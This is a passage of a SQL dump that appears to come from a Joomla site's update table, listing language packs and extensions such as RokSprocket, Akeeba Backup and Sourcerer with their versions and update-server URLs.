CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23569,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23570,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23571,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23572,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23573,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23574,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23575,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23576,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23577,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23578,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23579,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23580,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23581,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23582,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23583,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23584,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23585,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23586,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23587,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23588,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23589,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23590,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23591,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23592,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23593,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23594,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23595,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23596,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23597,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23598,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23599,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23600,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23601,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23602,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23603,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23604,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23605,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23606,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23607,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23608,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23609,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23610,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23611,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23612,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23613,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23614,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23615,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23616,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23617,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23618,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23619,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23620,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23621,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23622,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23623,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23624,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23625,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23626,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23627,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23628,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23629,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23630,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23631,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23632,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23633,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23634,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23635,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23636,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23637,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23638,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23639,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23640,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23641,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23642,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23643,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23644,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23645,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23646,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23647,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23648,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23649,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23650,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23651,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23652,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23653,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23654,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23655,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23656,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23657,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23658,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23659,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23660,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23661,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23662,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23663,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23664,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23665,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23666,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23667,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23668,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23669,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23670,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23671,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23672,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23673,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23674,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23675,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23676,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23677,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23678,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23679,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23680,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23681,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23682,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23683,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23684,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23685,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23686,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23687,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23688,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23689,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23690,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23691,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23692,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23693,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23694,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23695,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23696,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23697,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23698,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23699,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23700,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23701,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23702,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23703,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23704,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23705,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23706,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23707,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23708,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23709,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23710,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23711,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23712,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23713,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23714,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23715,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23716,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23717,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23718,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23719,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23720,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23721,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23722,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23723,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23724,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23725,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23726,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23727,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23728,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23729,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23730,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23731,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23732,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23733,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23734,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23735,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23736,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23737,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23738,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23739,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23740,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23741,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23742,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23743,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23744,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23745,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23746,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23747,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23748,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23749,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23750,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23751,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23752,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23753,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23754,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23755,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23756,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23757,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23758,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23759,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23760,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23761,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23762,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23763,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23764,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23765,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23766,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23767,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23768,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23769,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23770,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23771,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23772,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23773,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23774,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23775,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23776,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23777,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23778,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23779,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23780,3,0,'English 